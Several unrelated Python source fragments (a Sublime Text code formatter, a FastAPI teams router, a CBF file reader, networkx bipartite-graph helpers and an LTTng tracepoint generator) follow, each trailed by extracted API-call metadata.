        if sublime.version() == '' or int(sublime.version()) > 3000:
            self.st_version = 3

        self.file_name = view.file_name()
        self.settings = sublime.load_settings('CodeFormatter.sublime-settings')
        self.packages_path = sublime.packages_path()
        self.syntax_file = view.settings().get('syntax')
        self.syntax = syntax or self.get_syntax()

        # Settings key -> formatter class. Each key's "syntaxes" value is a
        # comma-separated list of syntax names that class handles.
        option_classes = (
            ('codeformatter_php_options', PhpFormatter),
            ('codeformatter_js_options', JsFormatter),
            ('codeformatter_css_options', CssFormatter),
            ('codeformatter_html_options', HtmlFormatter),
            ('codeformatter_python_options', PyFormatter),
            ('codeformatter_vbscript_options', VbscriptFormatter),
            ('codeformatter_scss_options', ScssFormatter),
            ('codeformatter_coldfusion_options', ColdfusionFormatter),
            ('codeformatter_go_options', GoFormatter),
        )
        for option_name, formatter_class in option_classes:
            syntaxes = self.settings.get(option_name, {}).get('syntaxes')
            if not syntaxes or not isinstance(syntaxes, str):
                continue
            for syntax_name in syntaxes.split(','):
                self.classmap[syntax_name.strip()] = formatter_class

    def format(self, text):
        """Format `text` with the registered formatter; returns (stdout, stderr),
        both normalized through clean()."""
        formatter = self.classmap[self.syntax](self)
        try:
            stdout, stderr = formatter.format(text)
        except Exception as e:
            stdout, stderr = '', str(e)
        return self.clean(stdout), self.clean(stderr)

    def exists(self):
        """True when a formatter is registered for the current syntax."""
        return self.syntax in self.classmap

    def get_syntax(self):
        """Derive the lowercase syntax name from the view's syntax file path."""
        matched = re.search(
            r'Packages/.*/(.+?).(?=tmLanguage|sublime-syntax)',
            self.syntax_file)
        if matched and matched.groups():
            return matched.groups()[0].lower()
        return ''

    def format_on_save_enabled(self):
        """Whether format-on-save applies to the current file."""
        if not self.exists():
            return False
        formatter = self.classmap[self.syntax](self)
        return formatter.format_on_save_enabled(self.file_name)

    def clean(self, string):
        """Decode byte output as UTF-8 and normalize line endings to \\n."""
        if hasattr(string, 'decode'):
            string = string.decode('UTF-8', 'ignore')
        return re.sub(r'\r\n|\r', '\n', string)
| [
"sublime.version",
"re.compile",
"os.path.join",
"sublime.packages_path",
"os.path.realpath",
"sublime.platform",
"re.sub",
"sys.path.append",
"sublime.load_settings"
] | [((299, 329), 'os.path.join', 'os.path.join', (['directory', '"""lib"""'], {}), "(directory, 'lib')\n", (311, 329), False, 'import os\n'), ((259, 285), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (275, 285), False, 'import os\n'), ((365, 391), 'sys.path.append', 'sys.path.append', (['libs_path'], {}), '(libs_path)\n', (380, 391), False, 'import sys\n'), ((1347, 1365), 'sublime.platform', 'sublime.platform', ([], {}), '()\n', (1363, 1365), False, 'import sublime\n'), ((1589, 1644), 'sublime.load_settings', 'sublime.load_settings', (['"""CodeFormatter.sublime-settings"""'], {}), "('CodeFormatter.sublime-settings')\n", (1610, 1644), False, 'import sublime\n'), ((1674, 1697), 'sublime.packages_path', 'sublime.packages_path', ([], {}), '()\n', (1695, 1697), False, 'import sublime\n'), ((3156, 3217), 're.compile', 're.compile', (['"""Packages/.*/(.+?).(?=tmLanguage|sublime-syntax)"""'], {}), "('Packages/.*/(.+?).(?=tmLanguage|sublime-syntax)')\n", (3166, 3217), False, 'import re\n'), ((3746, 3780), 're.sub', 're.sub', (['"""\\\\r\\\\n|\\\\r"""', '"""\n"""', 'string'], {}), "('\\\\r\\\\n|\\\\r', '\\n', string)\n", (3752, 3780), False, 'import re\n'), ((1432, 1449), 'sublime.version', 'sublime.version', ([], {}), '()\n', (1447, 1449), False, 'import sublime\n'), ((1463, 1480), 'sublime.version', 'sublime.version', ([], {}), '()\n', (1478, 1480), False, 'import sublime\n')] |
from typing import List, Optional
from attr import dataclass
from fastapi import APIRouter, Security
from fastapi.exceptions import HTTPException
from fastapi import Header
from pydantic import BaseModel
from pydantic.tools import parse_obj_as
from splash.api.auth import get_current_user
from splash.service import SplashMetadata
from splash.service.base import ObjectNotFoundError
from ..users import User
from . import NewTeam, Team
from .teams_service import TeamsService
teams_router = APIRouter()
@dataclass
class Services():
    # Container for the service singletons this router depends on.
    teams: TeamsService
# Module-level holder; `teams` is injected at application startup.
services = Services(None)
def set_teams_service(svc: TeamsService):
    # Dependency-injection hook: installs the TeamsService the routes use.
    services.teams = svc
class CreateTeamResponse(BaseModel):
    # Response body for create/update: the object's uid plus server metadata.
    uid: str
    splash_md: SplashMetadata
@teams_router.get("", tags=["teams"], response_model=List[Team])
def read_teams(
        page: int = 1,
        page_size: int = 100,
        current_user: User = Security(get_current_user)):
    """Return one page of teams visible to the authenticated user."""
    results = services.teams.retrieve_multiple(current_user, page=page, page_size=page_size)
    return parse_obj_as(List[Team], list(results))
@teams_router.get("/{uid}", tags=['teams'], response_model=Team)
def read_team(
        uid: str,
        current_user: User = Security(get_current_user)):
    """Fetch a single team by its uid."""
    return services.teams.retrieve_one(current_user, uid)
@teams_router.post("", tags=['teams'], response_model=CreateTeamResponse)
def create_team(
        team: NewTeam,
        current_user: User = Security(get_current_user)):
    """Create a new team; returns its uid and server metadata."""
    return services.teams.create(current_user, team)
@teams_router.put("/{uid}", tags=['teams'], response_model=CreateTeamResponse)
def update_team(uid: str,
                team: NewTeam,
                current_user: User = Security(get_current_user),
                if_match: Optional[str] = Header(None)):
    """Replace the team `uid`; honours optional If-Match ETag concurrency.

    Fix: `response_model=CreateTeamResponse` was previously declared as a
    *function parameter*, where FastAPI would interpret it as a request
    parameter; it belongs in the route decorator.

    :raises HTTPException: 404 when no team with `uid` exists.
    """
    try:
        response = services.teams.update(current_user, team, uid, etag=if_match)
    except ObjectNotFoundError:
        raise HTTPException(404)
    return response
| [
"fastapi.Security",
"fastapi.exceptions.HTTPException",
"fastapi.APIRouter",
"fastapi.Header"
] | [((494, 505), 'fastapi.APIRouter', 'APIRouter', ([], {}), '()\n', (503, 505), False, 'from fastapi import APIRouter, Security\n'), ((917, 943), 'fastapi.Security', 'Security', (['get_current_user'], {}), '(get_current_user)\n', (925, 943), False, 'from fastapi import APIRouter, Security\n'), ((1227, 1253), 'fastapi.Security', 'Security', (['get_current_user'], {}), '(get_current_user)\n', (1235, 1253), False, 'from fastapi import APIRouter, Security\n'), ((1491, 1517), 'fastapi.Security', 'Security', (['get_current_user'], {}), '(get_current_user)\n', (1499, 1517), False, 'from fastapi import APIRouter, Security\n'), ((1737, 1763), 'fastapi.Security', 'Security', (['get_current_user'], {}), '(get_current_user)\n', (1745, 1763), False, 'from fastapi import APIRouter, Security\n'), ((1858, 1870), 'fastapi.Header', 'Header', (['None'], {}), '(None)\n', (1864, 1870), False, 'from fastapi import Header\n'), ((2009, 2027), 'fastapi.exceptions.HTTPException', 'HTTPException', (['(404)'], {}), '(404)\n', (2022, 2027), False, 'from fastapi.exceptions import HTTPException\n')] |
#!/usr/bin/env libtbx.python
#
# iotbx.xds.xds_cbf.py
#
# <NAME>, Diamond Light Source, 2012/OCT/16
#
# Class to read the CBF files used in XDS
#
from __future__ import absolute_import, division, print_function
class reader:
"""A class to read the CBF files used in XDS"""
def __init__(self):
pass
def read_file(self, filename):
"""Read the CBF file"""
import pycbf
self.cbf_handle = pycbf.cbf_handle_struct()
self.cbf_handle.read_file(filename, pycbf.MSG_DIGEST)
self.cbf_handle.rewind_datablock()
def get_data(self):
"""Get the gain array from the file"""
import numpy
# Select the first datablock and rewind all the categories
self.cbf_handle.select_datablock(0)
self.cbf_handle.select_category(0)
self.cbf_handle.select_column(2)
self.cbf_handle.select_row(0)
# Check the type of the element to ensure it's a binary
# otherwise raise an exception
type = self.cbf_handle.get_typeofvalue()
if type.find('bnry') > -1:
# Read the image data into an array
image_string = self.cbf_handle.get_integerarray_as_string()
image = numpy.fromstring(image_string, numpy.int32)
# Get the array parameters
parameters = self.cbf_handle.get_integerarrayparameters_wdims()
image_size = (parameters[10], parameters[9])
# Resize the image
image.shape = (image_size)
else:
raise TypeError('Can\'t find image')
# Return the image
return image
if __name__ == '__main__':
    # CLI entry point: read the CBF file named on the command line and load
    # its first binary array (exercises the reader; result is unused).
    import sys
    import numpy
    handle = reader()
    handle.read_file(sys.argv[1])
    image = handle.get_data()
| [
"pycbf.cbf_handle_struct",
"numpy.fromstring"
] | [((412, 437), 'pycbf.cbf_handle_struct', 'pycbf.cbf_handle_struct', ([], {}), '()\n', (435, 437), False, 'import pycbf\n'), ((1127, 1170), 'numpy.fromstring', 'numpy.fromstring', (['image_string', 'numpy.int32'], {}), '(image_string, numpy.int32)\n', (1143, 1170), False, 'import numpy\n')] |
# utils for graphs of the networkx library
import copy
import networkx as nx
from networkx.algorithms.shortest_paths import shortest_path
from typing import Any, Union, Optional, Iterator, Iterable, Tuple, Dict, List, cast
# Side identifiers for the two partitions of a bipartite graph.
LEFT = 0
RIGHT = 1
def top_nodes(graph: nx.Graph,
              data: bool = False) -> Union[Iterator[Any], Iterator[Tuple[Any, Any]]]:
    """Yield the nodes of the top partition (attribute bipartite == 0).

    With data=True, yields (node_id, attribute_dict) pairs instead.
    """
    for node_id, attributes in graph.nodes(data=True):
        if attributes['bipartite'] != 0:
            continue
        yield (node_id, attributes) if data else node_id
def bottom_nodes(graph: nx.Graph,
                 data: bool = False) -> Union[Iterator[Any], Iterator[Tuple[Any, Any]]]:
    """Yield the nodes of the bottom partition (attribute bipartite == 1).

    With data=True, yields (node_id, attribute_dict) pairs instead.
    """
    for node_id, attributes in graph.nodes(data=True):
        if attributes['bipartite'] != 1:
            continue
        yield (node_id, attributes) if data else node_id
def bipartite_node_positions(graph: nx.Graph) -> Dict[int, Tuple[int, int]]:
    """Assign plot coordinates: top nodes in a column at x=1, bottom at x=2."""
    positions: Dict[int, Tuple[int, int]] = {}
    for row, node in enumerate(top_nodes(graph)):
        positions[node] = (1, row)
    for row, node in enumerate(bottom_nodes(graph)):
        positions[node] = (2, row)
    return positions
def draw_bipartite(graph: nx.Graph) -> None:
    """Draw the graph in two columns with node ids as labels."""
    pos = bipartite_node_positions(graph)
    nx.draw(graph, pos=pos, with_labels=True, font_weight='bold')
def draw_nodes(graph: nx.Graph, labels: bool = False) -> None:
    """Draw only the nodes at the standard bipartite positions.

    With labels=True each node's 'label' attribute is rendered, anchored left
    for the top column and right for the bottom column; otherwise node ids
    are used.
    """
    pos = bipartite_node_positions(graph)
    nx.draw_networkx_nodes(graph, pos=pos, node_size=300)
    if labels:
        top_node_labels = {k: str(v['label']) for k, v in tuple(top_nodes(graph, data=True))}
        nx.draw_networkx_labels(graph, pos=pos, labels=top_node_labels, horizontalalignment='left')
        bottom_node_labels = {k: str(v['label']) for k, v in tuple(bottom_nodes(graph, data=True))}
        nx.draw_networkx_labels(graph,
                                pos=pos,
                                labels=bottom_node_labels,
                                horizontalalignment='right')
    else:
        nx.draw_networkx_labels(graph, pos=pos)
def draw_edges(graph: nx.Graph, edge_list: Optional[Iterable[Tuple[Any, Any]]] = None) -> None:
    """Draw the given edges (or all edges when edge_list is None)."""
    pos = bipartite_node_positions(graph)
    nx.draw_networkx_edges(graph, pos=pos, edgelist=edge_list)
def draw_matching(graph: nx.Graph, matching: Dict[Any, Any], labels: bool = False) -> None:
    """Draw all nodes but only the edges belonging to `matching`."""
    draw_nodes(graph, labels=labels)
    draw_edges(graph, matching.items())
def find_cycle_with_edge_of_matching(graph: nx.Graph, matching: Dict[Any, Any]) -> List[Any]:
    """Find a cycle in `graph` that uses at least one matching edge.

    For each matching edge (k, v): temporarily delete it and search for a
    shortest path v -> k. If such a path exists, it closes into a cycle with
    the deleted edge, and the path is returned.

    :raises nx.NetworkXNoCycle: if no such cycle exists.
    """
    work_graph = copy.deepcopy(graph)
    for left, right in matching.items():
        # The graph could have been reduced, so the edge may be absent.
        if not work_graph.has_edge(left, right):
            continue
        work_graph.remove_edge(left, right)
        try:
            path = shortest_path(G=work_graph, source=right, target=left)
        except nx.NetworkXNoPath:
            path = None
        # Restore the edge regardless of the outcome.
        work_graph.add_edge(left, right)
        if path is not None:
            return cast(List[Any], path)
    # No cycle was found
    raise nx.NetworkXNoCycle
def find_feasible_two_edge_path(graph: nx.Graph,
                                matching: Dict[Any, Any]) -> Optional[Tuple[Any, Any, Any]]:
    """Find a 2-edge path made of one matching edge plus one adjacent
    unmatched edge; returns the three nodes in path order, or None."""
    # This path has the form top1 -> bottom -> top2 or bottom1 -> top -> bottom2
    # first: must be in the left part of the graph and in matching
    # second: must be in the right part of the graph and in matching
    # third: is also in the left part of the graph and but must not be in matching
    for top, bottom in matching.items():
        if top in top_nodes(graph) and bottom in bottom_nodes(graph):
            # Extend from `top` to a bottom neighbor not used by the matching...
            for new_bottom in graph.neighbors(top):
                if new_bottom not in matching.values():
                    return (bottom, top, new_bottom)
            # ...or from `bottom` to a top neighbor not used by the matching.
            for new_top in graph.neighbors(bottom):
                if new_top not in matching:
                    return (top, bottom, new_top)
    return None
def strongly_connected_components_decomposition(graph: nx.DiGraph) -> nx.DiGraph:
    """Delete every edge that leaves its strongly connected component.

    Mutates `graph` in place and also returns it for convenience.
    """
    for component in nx.strongly_connected_components(graph):
        for source in component:
            # Materialize the crossing edges first: the adjacency view must
            # not be mutated while it is being iterated.
            crossing = [t for t in graph.adj[source] if t not in component]
            for target in crossing:
                graph.remove_edge(source, target)
    return graph
def create_directed_matching_graph(graph: nx.Graph, top_nodes: Iterable[Any],
                                   matching: Dict[Any, Any]) -> nx.DiGraph:
    """Orient the bipartite graph: matching edges point top->bottom, every
    other edge bottom->top. (NOTE(review): parameter `top_nodes` shadows the
    module-level helper of the same name.)"""
    # creates a directed copy of the graph with all edges on both directions
    directed_graph = graph.to_directed()
    for top_node in top_nodes:
        for bottom_node in graph.adj[top_node]:
            if top_node in matching.keys() and bottom_node == matching[top_node]:
                # Matching edge: keep only the top -> bottom direction.
                directed_graph.remove_edge(bottom_node, top_node)
            else:
                # Non-matching edge: keep only the bottom -> top direction.
                directed_graph.remove_edge(top_node, bottom_node)
    # check for duplicated (should not exist any)
    ordered_edges = [tuple(sorted(e)) for e in directed_graph.edges]
    assert len(ordered_edges) == len(set(ordered_edges))
    assert len(graph.edges) == len(directed_graph.edges)
    assert len(graph.nodes) == len(directed_graph.nodes)
    return directed_graph
def graph_without_nodes_of_edge(graph: nx.Graph, edge: Tuple[Any, Any]) -> nx.Graph:
    """Returns a copy of this bipartite graph with the given edge and its adjacent nodes removed."""
    reduced = nx.Graph(graph)
    for endpoint in edge[:2]:
        reduced.remove_node(endpoint)
    assert reduced != graph
    assert len(reduced.nodes) == len(graph.nodes) - 2
    return reduced
def graph_without_edge(graph: nx.Graph, edge: Tuple[Any, Any]) -> nx.Graph:
    """Returns a copy of this bipartite graph with the given edge removed."""
    reduced = nx.Graph(graph)
    reduced.remove_edge(*edge)
    assert len(reduced.edges) == len(graph.edges) - 1
    assert len(reduced.nodes) == len(graph.nodes)
    return reduced
return new_graph | [
"networkx.algorithms.shortest_paths.shortest_path",
"networkx.strongly_connected_components",
"networkx.Graph",
"networkx.draw_networkx_nodes",
"networkx.draw_networkx_labels",
"copy.deepcopy",
"networkx.draw_networkx_edges",
"typing.cast",
"networkx.draw"
] | [((1342, 1403), 'networkx.draw', 'nx.draw', (['graph'], {'pos': 'pos', 'with_labels': '(True)', 'font_weight': '"""bold"""'}), "(graph, pos=pos, with_labels=True, font_weight='bold')\n", (1349, 1403), True, 'import networkx as nx\n'), ((1515, 1568), 'networkx.draw_networkx_nodes', 'nx.draw_networkx_nodes', (['graph'], {'pos': 'pos', 'node_size': '(300)'}), '(graph, pos=pos, node_size=300)\n', (1537, 1568), True, 'import networkx as nx\n'), ((2280, 2338), 'networkx.draw_networkx_edges', 'nx.draw_networkx_edges', (['graph'], {'pos': 'pos', 'edgelist': 'edge_list'}), '(graph, pos=pos, edgelist=edge_list)\n', (2302, 2338), True, 'import networkx as nx\n'), ((2622, 2642), 'copy.deepcopy', 'copy.deepcopy', (['graph'], {}), '(graph)\n', (2635, 2642), False, 'import copy\n'), ((4268, 4307), 'networkx.strongly_connected_components', 'nx.strongly_connected_components', (['graph'], {}), '(graph)\n', (4300, 4307), True, 'import networkx as nx\n'), ((5723, 5738), 'networkx.Graph', 'nx.Graph', (['graph'], {}), '(graph)\n', (5731, 5738), True, 'import networkx as nx\n'), ((6089, 6104), 'networkx.Graph', 'nx.Graph', (['graph'], {}), '(graph)\n', (6097, 6104), True, 'import networkx as nx\n'), ((1686, 1781), 'networkx.draw_networkx_labels', 'nx.draw_networkx_labels', (['graph'], {'pos': 'pos', 'labels': 'top_node_labels', 'horizontalalignment': '"""left"""'}), "(graph, pos=pos, labels=top_node_labels,\n horizontalalignment='left')\n", (1709, 1781), True, 'import networkx as nx\n'), ((1886, 1985), 'networkx.draw_networkx_labels', 'nx.draw_networkx_labels', (['graph'], {'pos': 'pos', 'labels': 'bottom_node_labels', 'horizontalalignment': '"""right"""'}), "(graph, pos=pos, labels=bottom_node_labels,\n horizontalalignment='right')\n", (1909, 1985), True, 'import networkx as nx\n'), ((2096, 2135), 'networkx.draw_networkx_labels', 'nx.draw_networkx_labels', (['graph'], {'pos': 'pos'}), '(graph, pos=pos)\n', (2119, 2135), True, 'import networkx as nx\n'), ((3010, 3056), 
'networkx.algorithms.shortest_paths.shortest_path', 'shortest_path', ([], {'G': 'tmp_graph', 'source': 'v', 'target': 'k'}), '(G=tmp_graph, source=v, target=k)\n', (3023, 3056), False, 'from networkx.algorithms.shortest_paths import shortest_path\n'), ((3219, 3240), 'typing.cast', 'cast', (['List[Any]', 'path'], {}), '(List[Any], path)\n', (3223, 3240), False, 'from typing import Any, Union, Optional, Iterator, Iterable, Tuple, Dict, List, cast\n')] |
#-------------------------------------------------------------------------------------------------------
# Copyright (C) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE.txt file in the project root for full license information.
#-------------------------------------------------------------------------------------------------------
import xml.dom.minidom as DOM
# ETW "win:*" in-type -> C argument type used in generated LTTng prototypes.
lttngDataTypeMapping = {
    "win:null" :" ",
    "win:Int64" :"const __int64",
    "win:ULong" :"const unsigned long",
    "win:count" :"*",
    "win:Struct" :"const char *",
    "win:GUID" :"const int",
    "win:AnsiString" :"const char*",
    "win:UnicodeString" :"const char*",
    "win:Double" :"const double",
    "win:Int32" :"const signed int",
    "win:HexInt32" :"const signed int",
    "win:Boolean" :"const bool",
    "win:UInt64" :"const unsigned __int64",
    "win:UInt32" :"const unsigned int",
    "win:UInt16" :"const unsigned short",
    "win:UInt8" :"const unsigned char",
    "win:Int8" :"const char",
    "win:Pointer" :"const uintptr_t",
    "win:Binary" :"const char"
    }
# ETW in-type (or "xs:*" out-type) -> LTTng ctf_* field macro name.
ctfDataTypeMapping = {
    "win:Int64" :"ctf_integer",
    "win:HexInt64" :"ctf_integer_hex",
    "win:ULong" :"ctf_integer",
    "win:count" :"ctf_sequence",
    "win:Struct" :"ctf_sequence",
    "win:GUID" :"ctf_sequence",
    "win:AnsiString" :"ctf_string",
    "win:UnicodeString" :"ctf_string",
    "win:Double" :"ctf_float",
    "win:Int32" :"ctf_integer",
    "win:HexInt32" :"ctf_integer_hex",
    "win:Boolean" :"ctf_integer",
    "win:UInt64" :"ctf_integer",
    "win:UInt32" :"ctf_integer",
    "win:UInt16" :"ctf_integer",
    "win:HexInt16" :"ctf_integer_hex",
    "win:UInt8" :"ctf_integer", #actually a character
    "win:Int8" :"ctf_integer", #actually a character
    "win:Pointer" :"ctf_integer",
    "win:Binary" :"ctf_sequence",
    "xs:string" :"ctf_string",
    "xs:unsignedLong" :"ctf_integer",
    "xs:unsignedInt" :"ctf_integer"
    }
# ETW in-type -> C type used in the PAL-facing declarations.
palDataTypeMapping ={
    "win:null" :" ",
    "win:Int64" :"const __int64",
    "win:ULong" :"const unsigned long",
    "win:count" :"*",
    "win:Struct" :"const void",
    "win:GUID" :"const GUID",
    "win:AnsiString" :"LPCSTR",
    "win:UnicodeString" :"PCWSTR",
    "win:Double" :"const double",
    "win:Int32" :"const signed int",
    "win:HexInt32" :"const signed int",
    "win:Boolean" :"const bool",
    "win:UInt64" :"const unsigned __int64",
    "win:UInt32" :"const unsigned int",
    "win:UInt16" :"const unsigned short",
    "win:UInt8" :"const unsigned char",
    "win:Int8" :"const char",
    "win:Pointer" :"const void*",
    "win:Binary" :"const char"
    }
# LTTng tracepoints accept at most this many TP_ARGS; templates exceeding it
# are "packed" into a single (length, buffer) pair.
MAX_LTTNG_ARGS = 10
def getParamSequenceSize(paramSequence, estimate):
    """Compute the byte size of a sequence of ETW in-types.

    :param paramSequence: iterable of "win:*" in-type names.
    :param estimate: when True, return a single estimated byte total
        (variable-length types get fixed guesses); when False, return a
        (fixed_bytes, pointer_count) tuple, leaving pointer sizes to the
        caller.
    :raises Exception: in estimate mode, for an in-type of unknown size.
    """
    total = 0
    pointers = 0
    for param in paramSequence:
        # Fix: added the "win:HexInt*" variants, which share their base
        # type's size but previously fell through to the error branch.
        if param in ["win:Int64", "win:UInt64", "win:Double", "win:HexInt64"]:
            total += 8
        elif param in ["win:ULong", "win:Int32", "win:Boolean", "win:HexInt32"]:
            total += 4
        # Fix: accept "win:GUID" as well; the bare "GUID" spelling never
        # matched the names used throughout the type maps.
        elif param in ["GUID", "win:GUID"]:
            total += 16
        elif param in ["win:UInt16", "win:HexInt16"]:
            total += 2
        # Fix: this previously read "win:Uint8" (lowercase 'i'), which never
        # matched the "win:UInt8" spelling used everywhere else; "win:Int8"
        # is the same size.
        elif param in ["win:UInt8", "win:Int8", "win:Binary"]:
            total += 1
        elif param == "win:Pointer":
            if estimate:
                total += 8
            else:
                pointers += 1
        elif estimate:
            if param in ["win:AnsiString", "win:Struct"]:
                total += 32
            elif param in ["win:UnicodeString"]:
                total += 64
            else:
                raise Exception ("Don't know size of " + param)
    if estimate:
        return total
    return total, pointers
class Template:
    """An ETW event template: an ordered parameter signature plus the
    struct/array count bookkeeping needed for serialization."""
    def __repr__(self):
        return "<Template " + self.name + " />"
    def __init__(self, name, prototypes, dependencies, structCounts, arrayCounts):
        # prototypes: FunctionSignature holding every parsed parameter.
        # dependencies: variable -> list of variables that must precede it
        #   (e.g. a count variable emitted before the array it sizes).
        self.name = name
        self.signature = FunctionSignature()
        self.structCounts = structCounts
        self.arrayCounts = arrayCounts
        for variable in prototypes.paramList:
            for dependency in dependencies[variable]:
                # Add each dependency to the signature once, in order.
                if not self.signature.getParam(dependency):
                    self.signature.append(dependency, prototypes.getParam(dependency))
    @property
    def num_params(self):
        # Number of parameters in the flattened signature.
        return len(self.signature.paramList)
    def getParam(self, name):
        return self.signature.getParam(name)
    @property
    def estimatedSize(self):
        # Estimated payload size in bytes, clamped to the range [32, 1024].
        total = getParamSequenceSize((self.getParam(paramName).winType for paramName in self.signature.paramList), True)
        if total < 32:
            return 32
        elif total > 1024:
            return 1024
        return total
class FunctionSignature:
    """Ordered collection of event parameters, addressable by variable name."""

    def __init__(self):
        self.LUT = {}        # variable name -> FunctionParameter
        self.paramList = []  # variable names in declaration order

    def __repr__(self):
        return ', '.join(self.paramList)

    def append(self, variable, param):
        """Register `param` under `variable`, preserving insertion order."""
        self.LUT[variable] = param
        self.paramList.append(variable)

    def getParam(self, variable):
        """Return the parameter registered for `variable`, or None."""
        return self.LUT.get(variable)

    def getLength(self):
        """Number of registered parameters."""
        return len(self.paramList)
class FunctionParameter:
    """A single event-template parameter parsed from the manifest."""

    def __init__(self, winType, name, count, outType, length):
        self.winType = winType   # ETW in-type, e.g. "win:Int32"
        self.outType = outType   # optional out-type override
        self.name = name
        self.length = length     # fixed 'length' attribute, if any
        # GUIDs and counted parameters are both emitted as sequences.
        if winType == "win:GUID" or count == "win:count":
            self.count = "win:count"
        else:
            self.count = "win:null"

    def __repr__(self):
        return self.name
# Manifest attributes recognised on <data> nodes: some are consumed, some
# deliberately ignored; anything else is treated as an error.
ignoredXmlAttributes = frozenset(["map"])
usedXmlAttributes = frozenset(["name", "inType", "count", "length", "outType"])
knownXmlAttributes = ignoredXmlAttributes | usedXmlAttributes


def checkKnownAttributes(nodes, templateName):
    """Raise ValueError if any node carries an unrecognised attribute."""
    for node in nodes:
        for attribute in node.attributes.values():
            if attribute.name not in knownXmlAttributes:
                raise ValueError('Unknown attribute: ' + attribute.name + ' in template ' + templateName)
def getTopLevelElementsByTagName(node, tag):
    """Like getElementsByTagName, but restricted to direct children of `node`."""
    matches = []
    for element in node.getElementsByTagName(tag):
        if element.parentNode == node:
            matches.append(element)
    return matches
def parseTemplateNodes(templateNodes):
    """Parse manifest <template> nodes into Template objects keyed by tid."""
    templates = {}
    for templateNode in templateNodes:
        templateName = templateNode.getAttribute('tid')
        dataNodes = getTopLevelElementsByTagName(templateNode, 'data')
        checkKnownAttributes(dataNodes, templateName)
        functionPrototypes = FunctionSignature()
        arrayCounts = {}
        structCounts = {}
        var_Dependencies = {}
        for dataNode in dataNodes:
            variable = dataNode.getAttribute('name')
            wintype = dataNode.getAttribute('inType')
            outType = dataNode.getAttribute('outType')
            wincount = dataNode.getAttribute('count')
            winLength = dataNode.getAttribute('length')
            var_dependency = [variable]
            # 'length' and 'count' are mutually exclusive on a <data> node.
            if winLength:
                if wincount:
                    raise Exception("Both count and length properties found on " + variable + " in template " + templateName)
            # A constant count of 1 is equivalent to no count at all.
            if wincount.isdigit() and int(wincount) == 1:
                wincount = ''
            if wincount:
                if wincount.isdigit():
                    raise Exception("Expect constant count to be length")
                elif functionPrototypes.getParam(wincount):
                    # Count references an earlier variable: record the
                    # dependency so the count precedes the array it sizes.
                    var_dependency.insert(0, wincount)
                    arrayCounts[variable] = wincount
            var_Dependencies[variable] = var_dependency
            functionParameter = FunctionParameter(wintype, variable, wincount, outType, winLength)
            functionPrototypes.append(variable, functionParameter)
        structNodes = getTopLevelElementsByTagName(templateNode, 'struct')
        for structNode in structNodes:
            structName = structNode.getAttribute('name')
            countName = structNode.getAttribute('count')
            # A struct's count must refer to a previously declared <data> var.
            assert(countName in functionPrototypes.paramList)
            #childData = structNode.getElementsByTagName("data")
            #names = [x.attributes['name'].value for x in childData]
            #types = [x.attributes['inType'].value for x in childData]
            structCounts[structName] = countName
            var_Dependencies[structName] = [countName, structName]
            # Structs are passed through as an opaque counted byte sequence.
            functionParameterPointer = FunctionParameter("win:Struct", structName, "win:count", None, None)
            functionPrototypes.append(structName, functionParameterPointer)
        templates[templateName] = Template(templateName, functionPrototypes, var_Dependencies, structCounts, arrayCounts)
    return templates
def shouldPackTemplate(template):
    """True when the event payload must be serialized into a single buffer:
    either too many arguments for LTTng, or any struct/array parameters."""
    if template.num_params > MAX_LTTNG_ARGS:
        return True
    return len(template.structCounts) > 0 or len(template.arrayCounts) > 0
def generateArgList(template):
    """Emit the TP_ARGS(...) macro body for a template; packed templates
    collapse to a single (length, byte-buffer) pair."""
    # Construct a TP_ARGS macro call, as defined in another macro, e.g.
    #
    # TP_ARGS( \
    #     int, my_integer_arg, \
    #     char*, my_string_arg \
    # )
    header = "TP_ARGS( \\\n"
    footer = "\\\n)"
    args = []
    if shouldPackTemplate(template):
        args.append("    const unsigned int, length")
        args.append("    const char *, __data__")
    else:
        signature = template.signature
        for param in signature.paramList:
            functionParam = signature.getParam(param)
            wintypeName = functionParam.winType
            mappedType = lttngDataTypeMapping[wintypeName]
            winCount = functionParam.count
            mappedCount = lttngDataTypeMapping[winCount]
            arg = "    " + mappedType
            # Counted parameters map to "*"; fixed-length ones also become
            # pointers.
            if mappedCount != " ":
                arg += mappedCount
            elif functionParam.length:
                arg += "*"
            arg += ", " + functionParam.name
            args.append(arg)
    return header + ", \\\n".join(args) + footer
def generateFieldList(template):
    """Emit the TP_FIELDS(...) macro body for a template.

    Packed templates serialize to a (length, byte-sequence) pair; otherwise
    each parameter maps to the matching ctf_* field macro.

    Fix: the struct/array branch referenced the nonexistent
    ``functionParam.prop`` (an AttributeError at runtime); the sequence
    length is the count variable already computed as ``countVar``.
    """
    # Construct a TP_FIELDS macro call, e.g.
    # TP_FIELDS(
    #     ctf_string(my_string_field, my_string_arg)
    #     ctf_integer(int, my_integer_field, my_integer_arg)
    # )
    header = "    " + "    TP_FIELDS(\n"
    footer = "\n    )"
    fieldList = []
    if shouldPackTemplate(template):
        fieldList.append("        ctf_integer(unsigned long, length, length)")
        fieldList.append("        ctf_sequence(char, __data__, __data__, unsigned long, length)")
    else:
        signature = template.signature
        for param in signature.paramList:
            functionParam = signature.getParam(param)
            wintypeName = functionParam.winType
            winCount = functionParam.count
            mappedCount = lttngDataTypeMapping[winCount]
            mappedType = lttngDataTypeMapping[wintypeName].replace("const ", "")
            # The out-type, when present, picks the ctf_* macro.
            if functionParam.outType:
                wintypeName = functionParam.outType
            ctf_type = None
            field_body = None
            varname = functionParam.name
            if param in template.structCounts or param in template.arrayCounts:
                # This is a struct, treat as a sequence
                countVar = template.structCounts.get(param, template.arrayCounts.get(param))
                ctf_type = "ctf_sequence"
                field_body = ", ".join((mappedType, varname, varname, "size_t", countVar))
            elif functionParam.length:
                ctf_type = "ctf_sequence"
                field_body = ", ".join((mappedType, varname, varname, "size_t", functionParam.length))
            else:
                ctf_type = ctfDataTypeMapping[wintypeName]
                if ctf_type == "ctf_string":
                    field_body = ", ".join((varname, varname))
                elif ctf_type == "ctf_integer" or ctf_type == "ctf_integer_hex" or ctf_type == "ctf_float":
                    field_body = ", ".join((mappedType, varname, varname))
                elif ctf_type == "ctf_sequence":
                    raise Exception("ctf_sequence needs special handling: " + template.name + " " + param)
                else:
                    raise Exception("Unhandled ctf intrinsic: " + ctf_type)
            # fieldList.append("// " + wintypeName)
            fieldList.append("        %s(%s)" % (ctf_type, field_body))
    return header + "\n".join(fieldList) + footer
def generateLttngHeader(providerName, lttngEventHeaderShortName, templates, events):
    """Generate the LTTng tracepoint header (tp<provider>.h) text.

